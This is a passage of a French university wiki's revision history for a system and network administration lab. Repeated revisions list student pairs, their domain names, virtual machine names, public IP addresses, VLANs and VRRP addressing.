| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice
|-
|}

{| class="wikitable"
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves
|-
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE
|-
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST
|-
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE
|-
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI
|-
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN
|-
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki
|-
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.
|-
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi
|-
|}

= Tableau des commutateurs virtuels =

{| class="wikitable"
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé
|-
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24
|-
|PAYET / DELOBELLE
|pont_pacman
|192.168.10.0/24
|-
|MERIEN / VANGHELUWE
|pont_pere
|192.168.0.0/24
|-
|CHEKLAT / BIERNACKI
|pont_ironman
|192.168.69.0/24
|-
|SALHI
|pont_msalhi
|192.168.20.0/24
|-
|GOURVEST/GHAZALI
|pont_diviseur
|192.168.67.0/24
|-
|YAHIANI / TEPELI
|pontclio
|192.168.7.0/24
|-
|GAUTHIER / SOUOP METSE
|pont_rock
|192.168.50.0/24
|}

= Tableau des réseaux virtuels =

VLAN privés :

{| class="wikitable"
! Nom !! Numéro
|-
| VLAN1 || 1
|-
| MV-PROMO || 2
|-
|E1_Pierre
|11
|-
|E2_Agathe
|12
|-
|E15_MSalhi
|13
|}

VLAN communs avec l'école :

{| class="wikitable"
! Nom !! Numéro
|-
| INTERCO1 || 530
|-
|}

= Schéma de câblage =

Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.

Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.

= Plan d'adressage =

{| class="wikitable"
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6
|-
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code>
|-
|}

Adresses IPv4 des éléments réseau dans VLAN1

{| class="wikitable"
! Elément !! Adresse
|-
| Routeur C9200-E304 || 172.27.0.1/16
|-
| Routeur C9200-E306 || 172.27.0.2/16
|-
| Borne Wi-Fi E306 || 172.27.0.3/16
|-
| Borne Wi-Fi E304 || 172.27.0.4/16
|-
|}

= Informations VRRP =

Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.

== VLAN des machines virtuelles ==

Une seule instance VRRP dans le VLAN des machines virtuelles.

Adresse IPv4 virtuelle : <code>193.48.57.162</code>

{| class="wikitable"
! Routeur !! IPv4 propre
|-
| C9200 E304 || <code>193.48.57.163</code>
|-
| C9200 E306 || <code>193.48.57.164</code>
|-
|}

== VLAN ... ==

SE4 IdO sécurité système/réseau 2025/2026

2026-02-10T13:52:39Z

Msalhi : /* Tableau des réseaux virtuels */

= Répartition des binômes pour les travaux pratiques "administration système et réseau" =

Préfixe des noms de machine : <code>SE4</code>.

Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.

{| class="wikitable"
! Cahier !! Elève !! Nom de domaine
! Nom de machine de services !! Nom de machine mandataire
|-
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice
|-
|}

{| class="wikitable"
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves
|-
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE
|-
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST
|-
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE
|-
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI
|-
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN
|-
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki
|-
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.
|-
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi
|-
|}

= Tableau des commutateurs virtuels =

{| class="wikitable"
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé
|-
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24
|-
|PAYET / DELOBELLE
|pont_pacman
|192.168.10.0/24
|-
|MERIEN / VANGHELUWE
|pont_pere
|192.168.0.0/24
|-
|CHEKLAT / BIERNACKI
|pont_ironman
|192.168.69.0/24
|-
|SALHI
|pont_msalhi
|192.168.20.0/24
|-
|GOURVEST/GHAZALI
|pont_diviseur
|192.168.67.0/24
|-
|YAHIANI / TEPELI
|pontclio
|192.168.7.0/24
|-
|GAUTHIER / SOUOP METSE
|pont_rock
|192.168.50.0/24
|}

= Tableau des réseaux virtuels =

VLAN privés :

{| class="wikitable"
! Nom !! Numéro
|-
| VLAN1 || 1
|-
| MV-PROMO || 2
|-
|E1_Pierre
|11
|-
|E2_Agathe
|12
|
|E15_MSalhi
|13
|}

VLAN communs avec l'école :

{| class="wikitable"
! Nom !! Numéro
|-
| INTERCO1 || 530
|-
|}

= Schéma de câblage =

Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.

Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.

= Plan d'adressage =

{| class="wikitable"
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6
|-
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code>
|-
|}

Adresses IPv4 des éléments réseau dans VLAN1

{| class="wikitable"
! Elément !! Adresse
|-
| Routeur C9200-E304 || 172.27.0.1/16
|-
| Routeur C9200-E306 || 172.27.0.2/16
|-
| Borne Wi-Fi E306 || 172.27.0.3/16
|-
| Borne Wi-Fi E304 || 172.27.0.4/16
|-
|}

= Informations VRRP =

Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.

== VLAN des machines virtuelles ==

Une seule instance VRRP dans le VLAN des machines virtuelles.

Adresse IPv4 virtuelle : <code>193.48.57.162</code>

{| class="wikitable"
! Routeur !! IPv4 propre
|-
| C9200 E304 || <code>193.48.57.163</code>
|-
| C9200 E306 || <code>193.48.57.164</code>
|-
|}

== VLAN ... ==

Atelier SysRes SE4 2025/2026 E15

2026-02-02T09:35:39Z

Msalhi :

Fichier:Polytech logo.png

2026-02-02T09:35:24Z

Msalhi :

Poly

Atelier SysRes SE4 2025/2026 E15

2026-02-02T09:14:21Z

Msalhi : Page créée avec « <div class="titlepage"> '''Rapport de Projet SE4 IdO Sécurité Système/Réseau''' '''Année Universitaire 2025-2026''' <div class="figure"> image </div> '''Étudiant: Mohamed SALHI''' '''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)''' '''Domaine: <code>msalhi.online</code>''' '''École Polytechnique Universitaire de Lille''' 2026-02-02 </div> = Introduction = Ce rapport doc... »

SE4 IdO sécurité système/réseau 2025/2026

2026-01-26T10:50:11Z

Msalhi : /* Tableau des commutateurs virtuels */

= Répartition des binômes pour les travaux pratiques "administration système et réseau" =

Préfixe des noms de machine : <code>SE4</code>.

Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.

{| class="wikitable"
! Cahier !! Elève !! Nom de domaine
! Nom de machine de services !! Nom de machine mandataire
|-
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice
|-
|}

{| class="wikitable"
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves
|-
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE
|-
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST
|-
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE
|-
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI
|-
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN
|-
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki
|-
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.
|-
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi
|-
|}

= Tableau des commutateurs virtuels =

{| class="wikitable"
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé
|-
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24
|-
|PAYET / DELOBELLE
|pont_pacman
|192.168.10.0/24
|-
|MERIEN / VANGHELUWE
|pont_pere
|192.168.0.0/24
|-
|CHEKLAT / BIERNACKI
|pont_ironman
|192.168.69.0/24
|-
|Mohamed Salhi
|pont_msalhi
|192.168.20.0/24
|-
|GOURVEST/GHAZALI
|pont_diviseur
|192.168.67.0/24
|-
|YAHIANI / TEPELI
|pontclio
|192.168.7.0/24
|}

= Tableau des réseaux virtuels =

VLAN privés :

{| class="wikitable"
! Nom !! Numéro
|-
| VLAN1 || 1
|-
| MV-PROMO || 2
|-
|}

VLAN communs avec l'école :

{| class="wikitable"
! Nom !! Numéro
|-
| INTERCO1 || 530
|-
|}

= Schéma de câblage =

Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.

Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.

= Plan d'adressage =

{| class="wikitable"
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6
|-
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code>
|-
|}

Adresses IPv4 des éléments réseau dans VLAN1

{| class="wikitable"
! Elément !! Adresse
|-
| Routeur C9200-E304 || 172.27.0.1/16
|-
| Routeur C9200-E306 || 172.27.0.2/16
|-
| Borne Wi-Fi E304 || 172.27.0.3/16
|-
| Borne Wi-Fi E306 || 172.27.0.4/16
|-
|}

= Informations VRRP =

Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.

== VLAN des machines virtuelles ==

Une seule instance VRRP dans le VLAN des machines virtuelles.

Adresse IPv4 virtuelle : <code>193.48.57.162</code>

{| class="wikitable"
! Routeur !! IPv4 propre
|-
| C9200 E304 || <code>193.48.57.163</code>
|-
| C9200 E306 || <code>193.48.57.164</code>
|-
|}

== VLAN ... ==

SE4 IdO sécurité système/réseau 2025/2026

2026-01-26T10:34:14Z

Msalhi : /* Tableau des commutateurs virtuels */

= Répartition des binômes pour les travaux pratiques "administration système et réseau" =

Préfixe des noms de machine : <code>SE4</code>.

Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.

{| class="wikitable"
! Cahier !! Elève !! Nom de domaine
! Nom de machine de services !! Nom de machine mandataire
|-
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || || SE4.C2||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || || SE4.RS7||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice
|-
|}

{| class="wikitable"
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves
|-
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE
|-
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST
|-
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE
|-
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI
|-
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN
|-
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki
|-
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.
|-
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi
|-
|}

= Tableau des commutateurs virtuels =

{| class="wikitable"
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé
|-
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24
|-
|PAYET / DELOBELLE
|pont_pacman
|192.168.10.0/24
|-
|MERIEN / VANGHELUWE
|pont_pere
|192.168.0.0/24
|-
|CHEKLAT / BIERNACKI
|pont_ironman
|192.168.69.0/24
|-
|Mohamed Salhi
|pont_msalhi
|192.168.10.0/24
|}

= Tableau des réseaux virtuels =

VLAN privés :

{| class="wikitable"
! Nom !! Numéro
|-
| VLAN1 || 1
|-
| MV-PROMO || 2
|-
|}

VLAN communs avec l'école :

{| class="wikitable"
! Nom !! Numéro
|-
| INTERCO1 || 530
|-
|}

= Schéma de câblage =

Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.

Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.

= Plan d'adressage =

{| class="wikitable"
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6
|-
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code>
|-
|}

Adresses IPv4 des éléments réseau dans VLAN1

{| class="wikitable"
! Elément !! Adresse
|-
| Routeur C9200-E304 ||
|-
| Routeur C9200-E306 ||
|-
| Borne Wi-Fi E304 ||
|-
| Borne Wi-Fi E306 ||
|-
|}

= Informations VRRP =

Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.

== VLAN des machines virtuelles ==

Une seule instance VRRP dans le VLAN des machines virtuelles.

Adresse IPv4 virtuelle : <code>193.48.57.162</code>

{| class="wikitable"
! Routeur !! IPv4 propre
|-
| C9200 E304 || <code>193.48.57.163</code>
|-
| C9200 E306 || <code>193.48.57.164</code>
|-
|}

== VLAN ... ==

SE4 IdO sécurité système/réseau 2025/2026

2026-01-26T10:33:53Z

Msalhi : /* Tableau des commutateurs virtuels */

= Répartition des binômes pour les travaux pratiques "administration système et réseau" =

Préfixe des noms de machine : <code>SE4</code>.

Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.

{| class="wikitable"
! Cahier !! Elève !! Nom de domaine
! Nom de machine de services !! Nom de machine mandataire
|-
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || || SE4.C2||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || || SE4.RS7||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice
|-
|}

{| class="wikitable"
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves
|-
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE
|-
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST
|-
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE
|-
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI
|-
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN
|-
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki
|-
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.
|-
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi
|-
|}

= Tableau des commutateurs virtuels =

{| class="wikitable"
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé
|-
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24
|-
|PAYET / DELOBELLE
|pont_pacman
|192.168.10.0/24
|-
|MERIEN / VANGHELUWE
|pont_pere
|192.168.0.0/24
|-
|CHEKLAT / BIERNACKI
|pont_ironman
|192.168.69.0/24
|-
|Mohamed Salhi
|pont_msalhi
|192.168.10.0/24

}

= Tableau des réseaux virtuels =

VLAN privés :

{| class="wikitable"
! Nom !! Numéro
|-
| VLAN1 || 1
|-
| MV-PROMO || 2
|-
|}

VLAN communs avec l'école :

{| class="wikitable"
! Nom !! Numéro
|-
| INTERCO1 || 530
|-
|}

= Schéma de câblage =

Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.

Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.

= Plan d'adressage =

{| class="wikitable"
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6
|-
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code>
|-
|}

Adresses IPv4 des éléments réseau dans VLAN1

{| class="wikitable"
! Elément !! Adresse
|-
| Routeur C9200-E304 ||
|-
| Routeur C9200-E306 ||
|-
| Borne Wi-Fi E304 ||
|-
| Borne Wi-Fi E306 ||
|-
|}

= Informations VRRP =

Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.

== VLAN des machines virtuelles ==

Une seule instance VRRP dans le VLAN des machines virtuelles.

Adresse IPv4 virtuelle : <code>193.48.57.162</code>

{| class="wikitable"
! Routeur !! IPv4 propre
|-
| C9200 E304 || <code>193.48.57.163</code>
|-
| C9200 E306 || <code>193.48.57.164</code>
|-
|}

== VLAN ... ==

SE4 IdO sécurité système/réseau 2025/2026

2026-01-26T10:33:27Z

Msalhi : /* Tableau des commutateurs virtuels */

= Répartition des binômes pour les travaux pratiques "administration système et réseau" =

Préfixe des noms de machine : <code>SE4</code>.

Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.

{| class="wikitable"
! Cahier !! Elève !! Nom de domaine
! Nom de machine de services !! Nom de machine mandataire
|-
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || || SE4.C2||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || || SE4.RS7||SE4.Garage
|-
